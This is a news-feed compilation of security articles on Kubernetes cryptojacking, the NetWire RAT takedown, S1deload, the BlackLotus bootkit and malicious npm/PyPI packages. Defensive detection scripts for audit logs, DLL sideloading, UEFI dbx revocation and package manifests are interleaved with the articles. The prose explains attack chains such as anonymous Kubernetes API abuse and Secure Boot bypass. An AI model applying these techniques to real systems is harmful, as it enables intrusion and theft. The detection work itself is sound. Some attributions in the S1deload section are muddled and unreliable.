The post Mispadu Banking Trojan Is Stealing Millions From Victims In Chile, Mexico, Peru And Portugal appeared first on Information Security Newspaper | Hacking News.

New cryptojacking malware can hack in Kubernetes clusters using this easy trick https://www.securitynewspaper.com/2023/03/15/new-cryptojacking-malware-can-hack-in-kubernetes-clusters-using-this-easy-trick/ Thu, 16 Mar 2023 00:25:32 +0000 https://www.securitynewspaper.com/?p=26432

The post New cryptojacking malware can hack in Kubernetes clusters using this easy trick appeared first on Information Security Newspaper | Hacking News.

Dero is a relatively new cryptocurrency that places a strong emphasis on privacy. It utilizes directed acyclic graph (DAG) technology, which allows it to make the claim that its transactions are completely anonymous. The combination of anonymity and a greater rewards ratio makes it potentially attractive for cryptojacking organizations in comparison to Monero, which is the coin that is most often used by attackers or groups conducting miner operations. CrowdStrike has discovered the first-ever Dero cryptojacking operation targeting Kubernetes infrastructure. 

A cryptojacking operation mining Monero was also discovered; it is aware of the Dero campaign and is actively competing with it. The Monero campaign mines XMR on the host, escalating privileges by using DaemonSets whose pods mount the host filesystem as the root user.

Attackers specifically targeted Kubernetes clusters running on non-standard ports, scanning for and locating exposed clusters started with the authentication setting --anonymous-auth=true, which enables anonymous access to the Kubernetes API. A user with adequate access can also mistakenly expose a secure Kubernetes API on the host where kubectl is running by issuing the "kubectl proxy" command; this is a less obvious way to expose the cluster without authentication. The Kubernetes control plane API does not provide anonymous access out of the box. Nevertheless, since the decision to make secure-by-default settings the default came late, and there are a variety of ways in which Kubernetes can be inadvertently exposed, there is still a legacy of exposed systems on the internet.

After the initial interaction with the Kubernetes API, the attacker installs a Kubernetes DaemonSet named "proxy-api." The DaemonSet places a pod containing malicious code on every node in the cluster, which lets the attackers run the cryptojacking operation using the resources of all the nodes at once. The mining work performed by the pods goes to a community pool, which then splits the reward (in Dero) equitably among all of its contributors via their own wallets.

Once the vulnerable Kubernetes cluster had been compromised, the attackers made no attempt to pivot, either by moving laterally to attack additional resources or by scanning the internet for further targets. This pattern is common among cryptojacking campaigns observed in the wild.

Nor did the attackers try to remove or interfere with the functioning of the cluster. Instead, they used a DaemonSet to mine Dero. The DaemonSet was named "proxy-api" and the miner "pause," both terms that are commonly seen in Kubernetes logs.
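As an added example (not CrowdStrike's code, nor anything from the campaign), the following script shows what the defender-side view of the activity described above looks like in Kubernetes audit logs: it flags write requests made by system:anonymous, DaemonSet creations whose names mimic system components such as "proxy-api" and "pause", and pod templates that mount the host or run privileged, and it checks that a kube-apiserver command line explicitly sets --anonymous-auth=false. The audit events, IP addresses, image name and the look-alike name list are constructed.

```python
"""Triage Kubernetes audit events for the activity described above.

Added example, not CrowdStrike's code. The audit events are constructed and
follow the audit.k8s.io/v1 Event layout; the apiserver flag check only looks
at --anonymous-auth, the flag named in the article.
"""
import json

WRITE_VERBS = {"create", "update", "patch", "delete"}
# "proxy-api" and "pause" are the names reported in the article; the rest are
# constructed look-alikes of system component names.
LOOKALIKE_NAMES = {"proxy-api", "pause", "api-proxy", "kube-proxy-api"}


def anonymous_auth_disabled(apiserver_args):
    """True only when the kube-apiserver command line sets --anonymous-auth=false
    explicitly, so the decision is not left to the distribution's defaults."""
    return any(arg.strip() == "--anonymous-auth=false" for arg in apiserver_args)


def is_unauthenticated(user):
    return (user.get("username") == "system:anonymous"
            or "system:unauthenticated" in user.get("groups", []))


def risky_pod_spec(pod_spec):
    """hostPath mounts and privileged/root containers are what a miner needs
    to take over the node; report each one."""
    reasons = []
    for vol in pod_spec.get("volumes", []):
        if "hostPath" in vol:
            reasons.append(f"hostPath volume mounts {vol['hostPath'].get('path')}")
    for c in pod_spec.get("containers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged") or sc.get("runAsUser") == 0:
            reasons.append(f"container {c.get('name')} is privileged or runs as uid 0")
    return reasons


def triage_event(ev):
    """Return the reasons one audit event deserves attention (empty if none)."""
    if ev.get("stage") != "ResponseComplete":
        return []
    reasons, ref, verb = [], ev.get("objectRef", {}), ev.get("verb")
    code = ev.get("responseStatus", {}).get("code", 0)
    if is_unauthenticated(ev.get("user", {})) and verb in WRITE_VERBS:
        reasons.append("write request by an unauthenticated principal")
    if ref.get("resource") == "daemonsets" and verb == "create" and 200 <= code < 300:
        reasons.append("DaemonSet created: its pod runs on every node")
        if ref.get("name") in LOOKALIKE_NAMES:
            reasons.append(f"name mimics a system component: {ref['name']}")
        # The pod template is only present at audit level RequestResponse.
        template = (ev.get("requestObject", {}).get("spec", {})
                    .get("template", {}).get("spec", {}))
        reasons.extend(risky_pod_spec(template))
    return reasons


def triage_log(lines):
    """Parse JSON-lines audit output; return (timestamp, source IP, reasons) per hit."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        reasons = triage_event(ev)
        if reasons:
            hits.append((ev.get("requestReceivedTimestamp"),
                         (ev.get("sourceIPs") or ["?"])[0], reasons))
    return hits


# Constructed sample events (203.0.113.0/24 is a documentation address range).
MALICIOUS_DAEMONSET = {
    "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "RequestResponse",
    "stage": "ResponseComplete", "verb": "create",
    "requestReceivedTimestamp": "2023-03-10T12:00:00.000000Z",
    "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
    "sourceIPs": ["203.0.113.7"],
    "objectRef": {"resource": "daemonsets", "apiGroup": "apps",
                  "namespace": "kube-system", "name": "proxy-api"},
    "responseStatus": {"code": 201},
    "requestObject": {"spec": {"template": {"spec": {
        "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
        "containers": [{"name": "pause", "image": "registry.invalid/pause:latest",
                        "securityContext": {"privileged": True}}]}}}},
}
BENIGN_DEPLOYMENT = {
    "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "Metadata",
    "stage": "ResponseComplete", "verb": "create",
    "requestReceivedTimestamp": "2023-03-10T12:01:00.000000Z",
    "user": {"username": "alice", "groups": ["system:authenticated"]},
    "sourceIPs": ["10.0.0.5"],
    "objectRef": {"resource": "deployments", "apiGroup": "apps",
                  "namespace": "web", "name": "frontend"},
    "responseStatus": {"code": 201},
}
ANONYMOUS_READ_DENIED = {
    "kind": "Event", "apiVersion": "audit.k8s.io/v1", "level": "Metadata",
    "stage": "ResponseComplete", "verb": "list",
    "requestReceivedTimestamp": "2023-03-10T12:02:00.000000Z",
    "user": {"username": "system:anonymous", "groups": ["system:unauthenticated"]},
    "sourceIPs": ["203.0.113.7"],
    "objectRef": {"resource": "pods", "namespace": "default"},
    "responseStatus": {"code": 403},
}
SAMPLE_AUDIT_LOG = [json.dumps(e) for e in
                    (MALICIOUS_DAEMONSET, BENIGN_DEPLOYMENT, ANONYMOUS_READ_DENIED)]

if __name__ == "__main__":
    for ts, src, reasons in triage_log(SAMPLE_AUDIT_LOG):
        print(ts, src, *("\n   - " + r for r in reasons))
    print("anonymous auth explicitly disabled:",
          anonymous_auth_disabled(["kube-apiserver", "--anonymous-auth=false"]))
```

The pod-template checks only fire when the audit policy logs DaemonSet writes at the RequestResponse level; at the Metadata level the script still catches the unauthenticated write and the look-alike name, which is why both checks are kept separate.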

These targeted behaviors define the goal of the campaign: the attackers were only seeking to mine Dero. As a result, we have reason to believe that a financially motivated cryptojacking actor is responsible for this campaign.

Attackers have taken advantage of the fact that Kubernetes has become the most popular container orchestrator in the world to focus their attention on misconfigurations, design flaws, and zero-day vulnerabilities inside Kubernetes and Docker.


Busted! Netwire malware infrastructure used to illegally steal data from computers seized https://www.securitynewspaper.com/2023/03/13/busted-netwire-malware-infrastructure-used-to-illegally-steal-data-from-computers-seized/ Tue, 14 Mar 2023 00:00:42 +0000 https://www.securitynewspaper.com/?p=26421

The post Busted! Netwire malware infrastructure used to illegally steal data from computers seized appeared first on Information Security Newspaper | Hacking News.


This week, federal authorities in Los Angeles seized an internet domain that was being used to sell malicious software for computers. This software allowed cybercriminals to take control of infected computers and steal a wide variety of information. The seizure of this domain was part of an international effort by law enforcement to combat cybercrime.

The website www.worldwiredlabs.com was seized on Tuesday under a seizure warrant that a United States Magistrate Judge approved on March 3. The warrant allowed for the seizure of the NetWire remote access trojan (RAT), a sophisticated program capable of targeting and infecting all of the major computer operating systems. According to court documents filed in Los Angeles, “a RAT is a type of malware that allows for covert surveillance, allowing a ‘backdoor’ for administrative control and unfettered and unauthorized remote access to a victim’s computer, without the victim’s knowledge or permission.” This information was gleaned from “A Malware That Allows for Covert Surveillance,” which was published by the Los Angeles Times.

On Tuesday, as part of the law enforcement operation that has been going on throughout this week, officials in Croatia arrested a Croatian citizen suspected of being the administrator of the website. The Croatian authorities will handle the prosecution. Also on Tuesday, Swiss law enforcement agencies seized the computer server that hosted the NetWire RAT infrastructure.

In 2020, the FBI’s Los Angeles office opened an investigation into worldwiredlabs, which was the only known online distributor of NetWire at the time. According to the affidavit that supported the seizure warrant, undercover FBI agents registered an account on the website, paid for a subscription plan, and “constructed a customized instance of the NetWire RAT using the product’s Builder Tool.”

The software was advertised on hacking forums, and numerous cyber security companies and government agencies have documented instances of the NetWire RAT being used in criminal activity. Although the website marketed NetWire as a legitimate tool for maintaining computer infrastructure, the affidavit states that NetWire is malware used for malicious purposes.

According to United States Attorney Martin Estrada, “today’s action is a testimony to the inventiveness and flexibility essential to confront cybercriminals who operate beyond boundaries.” “Our office will continue to develop worldwide partnerships in order to safeguard our communities from the dangers posed by cyberattacks. NetWire was used on a worldwide scale by criminals, and as a response, we have dismantled the infrastructure that was responsible for the incalculable amount of damage that was brought to victims all over the globe.”

According to Donald Alway, the Assistant Director in Charge of the FBI’s Los Angeles Field Office, “The FBI has affected the criminal cyber environment by deleting the Netwire RAT.” “The worldwide alliance that resulted in the arrest in Croatia also eliminated a popular program that was used to hijack computers in order to perpetrate global fraud, data breaches, and network assaults by threat organizations and cyber criminals,” the statement said.


New infostealer malware S1ideload infects systems of government & manufacturing companies https://www.securitynewspaper.com/2023/03/08/new-infostealer-malware-s1ideload-infects-systems-of-government-manufacturing-companies/ Wed, 08 Mar 2023 23:46:41 +0000 https://www.securitynewspaper.com/?p=26411

The post New infostealer malware S1ideload infects systems of government & manufacturing companies appeared first on Information Security Newspaper | Hacking News.

Criminals have abused social networks since their earliest days, and those networks now occupy an increasingly substantial part of our lives. With access to several genuine social media accounts, threat actors can extract large financial gains or even influence public opinion and alter the course of elections by using those accounts to spread malicious content. At the most basic level, financially motivated groups have set up malvertising and spam campaigns and built fully automated farms of content-sharing websites, either to boost income or to sell and rent hacked accounts to other bad actors.

A new worldwide campaign known as S1deload Stealer has been uncovered by Bitdefender. The campaign targets Facebook and YouTube accounts. The malware executes its harmful components through DLL sideloading: it relies on a legitimate, cryptographically signed executable which, when launched, inadvertently loads the malicious code.
S1deload Stealer infects systems successfully because sideloading helps it evade system defenses. In addition, to reduce the likelihood that the user will suspect the executable, it is delivered inside what looks like a genuine folder of pictures. Once a computer is infected, S1deload Stealer steals user credentials, imitates human behavior to artificially boost engagement with videos and other content, assesses the value of individual accounts (for example, by determining who the corporate social media admins are), mines BEAM cryptocurrency, and spreads the malicious link to the user’s followers.
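The sideloading pattern described above, as an added example rather than Bitdefender's code: a detector over image-load telemetry that flags a signed executable loading an unsigned (or differently signed) DLL from its own directory, with extra weight when the executable runs from a user-writable folder such as a pictures directory. The records, paths, publisher names and field names are constructed.

```python
"""Spot DLL sideloading in image-load telemetry.

Added example, not Bitdefender's code. The records are constructed and carry
a few fields modelled on Sysmon Event ID 7 (Image loaded): the host process,
the DLL it loaded, and the signature status of each.
"""
import ntpath
import re

# Folders an ordinary user can write to; a signed vendor executable living
# here next to its DLLs is the classic sideloading layout.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(Downloads|Pictures|Desktop|AppData)|ProgramData|Temp|Users\\Public)\\",
    re.I)


def sideload_indicators(ev):
    """Return the reasons one image-load event looks like sideloading (empty if none).
    Only signed host processes are considered: the technique's value is borrowing
    the reputation of a legitimately signed executable."""
    if not ev["signed"]:
        return []
    exe_dir = ntpath.dirname(ev["image"]).lower()
    dll_dir = ntpath.dirname(ev["image_loaded"]).lower()
    if exe_dir != dll_dir:
        return []  # resolved from elsewhere (System32 etc.): not the application-directory case
    reasons = []
    if not ev["loaded_signed"]:
        reasons.append(f"co-located DLL is unsigned: {ntpath.basename(ev['image_loaded'])}")
    elif ev["loaded_signer"] != ev["signer"]:
        reasons.append(f"co-located DLL signed by a different publisher: {ev['loaded_signer']}")
    if reasons and USER_WRITABLE.search(ev["image"]):
        reasons.append("signed executable runs from a user-writable folder")
    return reasons


def scan(events):
    """Return (host process, DLL, reasons) for each suspicious load."""
    hits = []
    for ev in events:
        reasons = sideload_indicators(ev)
        if reasons:
            hits.append((ev["image"], ev["image_loaded"], reasons))
    return hits


# Constructed sample: a signed viewer dropped in a "pictures" folder loads an
# unsigned DLL sitting beside it; the same binary loading kernel32 from
# System32 and a properly installed copy loading its own signed helper are benign.
SAMPLE_IMAGE_LOADS = [
    {"image": r"C:\Users\dana\Pictures\holiday\viewer.exe", "signed": True,
     "signer": "Example Software Ltd",
     "image_loaded": r"C:\Users\dana\Pictures\holiday\imgcodec.dll",
     "loaded_signed": False, "loaded_signer": None},
    {"image": r"C:\Users\dana\Pictures\holiday\viewer.exe", "signed": True,
     "signer": "Example Software Ltd",
     "image_loaded": r"C:\Windows\System32\kernel32.dll",
     "loaded_signed": True, "loaded_signer": "Microsoft Windows"},
    {"image": r"C:\Program Files\Example\viewer.exe", "signed": True,
     "signer": "Example Software Ltd",
     "image_loaded": r"C:\Program Files\Example\imgcodec.dll",
     "loaded_signed": True, "loaded_signer": "Example Software Ltd"},
    {"image": r"C:\Program Files\Example\viewer.exe", "signed": True,
     "signer": "Example Software Ltd",
     "image_loaded": r"C:\Program Files\Example\plugin.dll",
     "loaded_signed": True, "loaded_signer": "Other Publisher Inc"},
]

if __name__ == "__main__":
    for image, dll, reasons in scan(SAMPLE_IMAGE_LOADS):
        print(image, "->", dll)
        for r in reasons:
            print("   -", r)
```

The "different publisher" case is kept as a lower-confidence finding on its own because legitimate plug-in architectures produce it too; it is the combination with an unsigned DLL and a user-writable location that matches the delivery described in the article.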

Since November 2022, SYS01 Stealer has targeted personnel in a variety of sectors, including government and the industrial sector, with the goal of stealing information such as passwords, cookies, and data from Facebook ads and corporate accounts.

This campaign demonstrates how threat actors are increasingly leveraging ad content to trick consumers into clicking on harmful links by employing social engineering techniques.

According to our assessment, SYS01 continues methods similar to those used by other groups. Users should not be able to click on unchecked links or attachments on any messaging network, so platforms that allow this should be restricted. Taken as a whole, this shows how threat actors adapt their methods and techniques over time and zero in on particular targets, and how difficult it can be to definitively attribute a strain of malware to a particular group when both the malware and the groups that use it are in a state of perpetual change.


This new UEFI bootkit malware of size 80 Kb can hack patched Windows 11, 10 Machine with AV https://www.securitynewspaper.com/2023/03/01/this-new-uefi-bootkit-malware-of-size-80-kb-can-hack-patched-windows-11-10-machine-with-av/ Thu, 02 Mar 2023 01:24:10 +0000 https://www.securitynewspaper.com/?p=26377

The post This new UEFI bootkit malware of size 80 Kb can hack patched Windows 11, 10 Machine with AV appeared first on Information Security Newspaper | Hacking News.

Threat actors have taken note of the large number of UEFI vulnerabilities found in recent years, as well as the many missed opportunities to fix these flaws or revoke vulnerable binaries within an acceptable time frame. As a direct consequence, the first publicly known UEFI bootkit can now circumvent the crucial platform security feature UEFI Secure Boot. Experts have found a new UEFI bootkit capable of running even on fully updated Windows 11 systems with UEFI Secure Boot enabled. Because of the bootkit’s functionality and individual features, the researchers believe they are dealing with the bootkit known as BlackLotus, which has been sold on hacking forums for at least five thousand dollars since at least October 2022. UEFI bootkits are extremely dangerous because they have complete control over the operating system’s boot process, which allows them to disable a variety of OS security mechanisms and install their own kernel-mode or user-mode payloads in the early stages of startup. As a result, they can operate very covertly and with a high degree of privilege.

The following is a rundown of the most important information on BlackLotus, with a concise summary of the sequence of events connected to it.

  • It can run on the most recent versions of Windows 11 with all available patches installed and UEFI Secure Boot enabled. It does so by exploiting a vulnerability that is more than a year old (CVE-2022-21894) to get around UEFI Secure Boot and establish persistence for the bootkit. This is the first publicly known instance of this vulnerability being exploited in the wild.
  • Although the vulnerability was patched in Microsoft’s January 2022 update, exploitation is still feasible because the affected, legitimately signed binaries have not yet been added to the UEFI revocation list. BlackLotus takes advantage of this by bringing its own copies of those valid but vulnerable binaries onto the system in order to exploit the vulnerability.
  • It can disable operating system security measures including BitLocker, HVCI, and Windows Defender, among others.
  • Once installed, the bootkit’s primary objective is to deploy a kernel driver, which among other things protects the bootkit from removal, and an HTTP downloader, which communicates with the command and control server and can load additional user-mode or kernel-mode payloads.
  • BlackLotus has been promoted and offered for sale on underground forums since at least October 6th, 2022.
  • Interestingly, some of the BlackLotus installers investigated do not proceed with the installation of the bootkit if the compromised host uses one of the following locales:

  • Romanian (Moldova), ro-MD
  • Russian (Moldova), ru-MD
  • Russian (Russia), ru-RU
  • Ukrainian (Ukraine), uk-UA
  • Belarusian (Belarus), be-BY
  • Armenian (Armenia), hy-AM
  • Kazakh (Kazakhstan), kk-KZ
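The revocation-list point above is something a defender can check directly: whether a given bootloader's hash is present in the firmware's dbx. The following parser is an added example (not the researchers' tooling) for the EFI_SIGNATURE_LIST format that the db and dbx variables use. The sample dbx and the hashes in it are placeholders built inline, so the script demonstrates the check itself, not the status of any real binary; reading the live variable from Linux efivarfs (the path and the 4-byte attribute prefix in load_dbx_from_efivars) is the one platform assumption.

```python
"""Parse a UEFI signature database (db/dbx) and test whether a bootloader's
Authenticode hash is revoked.

Added example, not from the researchers. The format is the EFI_SIGNATURE_LIST
structure from the UEFI specification; the sample dbx is constructed here with
placeholder hashes, so it proves nothing about any real binary.
"""
import hashlib
import struct
import uuid

EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
_HDR = struct.Struct("<III")      # SignatureListSize, SignatureHeaderSize, SignatureSize
_LIST_HDR_LEN = 16 + _HDR.size    # SignatureType GUID + the three sizes


def parse_signature_lists(blob):
    """Return [(signature_type, owner, data)] for every entry in a run of
    EFI_SIGNATURE_LIST structures. Each list holds fixed-size entries of
    EFI_SIGNATURE_DATA = owner GUID (16 bytes) + payload (hash or DER cert)."""
    entries, off = [], 0
    while off < len(blob):
        if off + _LIST_HDR_LEN > len(blob):
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type = uuid.UUID(bytes_le=blob[off:off + 16])
        list_size, hdr_size, sig_size = _HDR.unpack_from(blob, off + 16)
        end = off + list_size
        if list_size < _LIST_HDR_LEN or end > len(blob) or sig_size <= 16:
            raise ValueError("corrupt EFI_SIGNATURE_LIST sizes")
        pos = off + _LIST_HDR_LEN + hdr_size
        while pos + sig_size <= end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            entries.append((sig_type, owner, blob[pos + 16:pos + sig_size]))
            pos += sig_size
        off = end
    return entries


def build_signature_list(sig_type, owner, payloads):
    """Inverse of the parser for one list of equally sized payloads (used here
    only to construct the sample dbx)."""
    sig_size = 16 + len(payloads[0])
    body = b"".join(owner.bytes_le + p for p in payloads)
    return sig_type.bytes_le + _HDR.pack(_LIST_HDR_LEN + len(body), 0, sig_size) + body


def revoked_sha256_hashes(dbx_blob):
    return {data for t, _, data in parse_signature_lists(dbx_blob)
            if t == EFI_CERT_SHA256_GUID}


def is_revoked(authenticode_sha256, dbx_blob):
    """dbx hash entries are Authenticode (PE image) digests, not plain file
    hashes, so the caller must compute the digest the Authenticode way."""
    return authenticode_sha256 in revoked_sha256_hashes(dbx_blob)


def load_dbx_from_efivars(
        path="/sys/firmware/efi/efivars/dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f"):
    """On Linux, efivarfs prefixes each variable's data with 4 bytes of attributes."""
    with open(path, "rb") as f:
        return f.read()[4:]


# Constructed sample dbx: two placeholder SHA-256 entries and one placeholder
# certificate entry. The owner GUID is arbitrary.
OWNER = uuid.UUID("00000000-0000-0000-0000-000000000001")
REVOKED_HASH = hashlib.sha256(b"placeholder: revoked loader").digest()
OTHER_HASH = hashlib.sha256(b"placeholder: another loader").digest()
SAMPLE_DBX = (
    build_signature_list(EFI_CERT_SHA256_GUID, OWNER,
                         [REVOKED_HASH, hashlib.sha256(b"placeholder: second revoked").digest()])
    + build_signature_list(EFI_CERT_X509_GUID, OWNER, [b"placeholder DER certificate bytes"])
)

if __name__ == "__main__":
    print("entries:", len(parse_signature_lists(SAMPLE_DBX)))
    print("revoked:", is_revoked(REVOKED_HASH, SAMPLE_DBX), is_revoked(OTHER_HASH, SAMPLE_DBX))
```

A negative answer from is_revoked is the situation the bullet list describes: a signed but vulnerable binary stays bootable until its Authenticode hash or signing certificate is added to dbx and the updated variable reaches the machine.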

A rundown of the attack
The figure illustrates a condensed version of the BlackLotus compromise chain. It is made up of three primary components:

  • It begins with the execution of an installer (step one), which deploys the bootkit’s files to the EFI System Partition, turns off HVCI and BitLocker, and restarts the computer.
  • After the first reboot, CVE-2022-21894 is exploited and the attackers’ Machine Owner Key (MOK) is enrolled to achieve persistence even on systems with UEFI Secure Boot enabled. The computer is then restarted once again.
  • On all subsequent boots, the self-signed UEFI bootkit executes and deploys both its kernel driver and its user-mode payload, an HTTP downloader. Together, these components give the bootkit the ability to withstand removal attempts and to download and execute further user-mode and driver components from the C&C server, according to the experts.


691 malicious npm packages and 49 PyPI components containing crypto-miners, remote access Trojans discovered https://www.securitynewspaper.com/2023/02/13/691-malicious-npm-packages-and-49-pypi-components-containing-crypto-miners-remote-access-trojans-discovered/ Mon, 13 Feb 2023 19:51:07 +0000 https://www.securitynewspaper.com/?p=26340

The post 691 malicious npm packages and 49 PyPI components containing crypto-miners, remote access Trojans discovered appeared first on Information Security Newspaper | Hacking News.

Security researchers have discovered yet another sizable haul of malicious packages on the open source registries npm and PyPI, packages that could cause problems if developers installed them without realizing it. The haul includes a number of different packages that all contain the same malicious package.go file, a Trojan horse program developed to mine cryptocurrency on Linux computers. According to Sonatype, sixteen of these could be traced back to the same actor, known as trendava, who has since been removed from the npm registry.

Other discoveries include PyPI malware called “minimums,” which checks for the presence of a virtual machine (VM) before carrying out its intended function. The goal is to thwart security researchers, who frequently run suspected malware in VMs in order to learn more about the threat.

The total number of packages that have been identified as malicious, suspicious, or proof-of-concept since 2019 has nearly reached 107,000 thanks to the discoveries made by the company’s AI tooling.

A new piece of Python malware with capabilities combining those of a remote access tool (RAT) and information stealer was also found by the security vendor.

Last but not least, it discovered a suspicious-looking developer account named “infinitebrahamanuniverse” that uploaded more than 33,000 packages describing themselves as sub-packages of “no-one-left-behind,” or “nolb.” The latter was taken down a week ago after the npm security team discovered that it depended on every other publicly available npm package. Now consider a malicious actor exploiting this dependency to launch an attack: by adding it to a typosquatting package, the actor can launch a denial-of-service (DoS) attack against a company’s download channel, wasting developers’ time as they wait for their npm environment to be ready. Installing a package with this dependency can also consume excessive resources. If you have been following this series, you already know that such events are not implausible.
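The dependency-bloat and typosquatting risks in the paragraph above can be caught before anything is installed. The script below is an added example, not Sonatype's tooling: it reviews a package.json for abnormal dependency fan-out, names within a keystroke of popular packages, and lifecycle scripts that run at install time. The manifest, the popular-name list and the 200-dependency threshold are constructed for illustration.

```python
"""Review a package.json for the dependency patterns in the article: abnormal
fan-out, names a keystroke away from popular packages, and lifecycle scripts
that run at install time.

Added example, not Sonatype's tooling. The manifest, the "popular" name list
and the 200-dependency threshold are constructed for illustration.
"""

POPULAR = {"lodash", "express", "react", "axios", "chalk", "commander", "moment", "debug"}


def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, or swap
    two adjacent characters each cost 1 (swaps are the typical typosquat)."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i] + [0] * len(b)
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                cur[j] = min(cur[j], prev2[j - 2] + 1)
        prev2, prev = prev, cur
    return prev[len(b)]


def lookalike_of(name, popular=POPULAR):
    """Popular package that `name` most resembles without being identical:
    distance 1 for short names, up to 2 for names of six characters or more."""
    best = None
    for p in popular:
        d = edit_distance(name, p)
        if 0 < d <= (2 if len(p) >= 6 else 1) and (best is None or d < best[1]):
            best = (p, d)
    return best[0] if best else None


def review_manifest(manifest, max_deps=200, popular=POPULAR):
    """Return human-readable findings for one manifest (empty list if clean)."""
    findings = []
    deps = {**manifest.get("dependencies", {}), **manifest.get("devDependencies", {})}
    if len(deps) > max_deps:
        findings.append(f"{len(deps)} direct dependencies: abnormal fan-out that can"
                        " stall the install pipeline and exhaust disk and CPU")
    for dep in deps:
        target = lookalike_of(dep, popular)
        if target:
            findings.append(f"'{dep}' is a near-miss of '{target}' (possible typosquat)")
    for hook in ("preinstall", "install", "postinstall"):
        if hook in manifest.get("scripts", {}):
            findings.append(f"'{hook}' script runs arbitrary code at install time:"
                            f" {manifest['scripts'][hook]}")
    return findings


# Constructed manifest: two misspelled popular names, a postinstall hook and
# 250 synthetic filler dependencies to trip the fan-out check.
SAMPLE_MANIFEST = {
    "name": "example-app",
    "scripts": {"postinstall": "node ./setup.js"},
    "dependencies": {"lodahs": "^4.17.0", "express": "^4.18.0", "axois": "^1.0.0",
                     **{f"filler-pkg-{i}": "1.0.0" for i in range(250)}},
}

if __name__ == "__main__":
    for finding in review_manifest(SAMPLE_MANIFEST):
        print("-", finding)
```

Run against a lockfile rather than package.json, the same fan-out check is what would surface a transitive dependency like the one described above, since the lockfile lists everything the install would actually pull.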

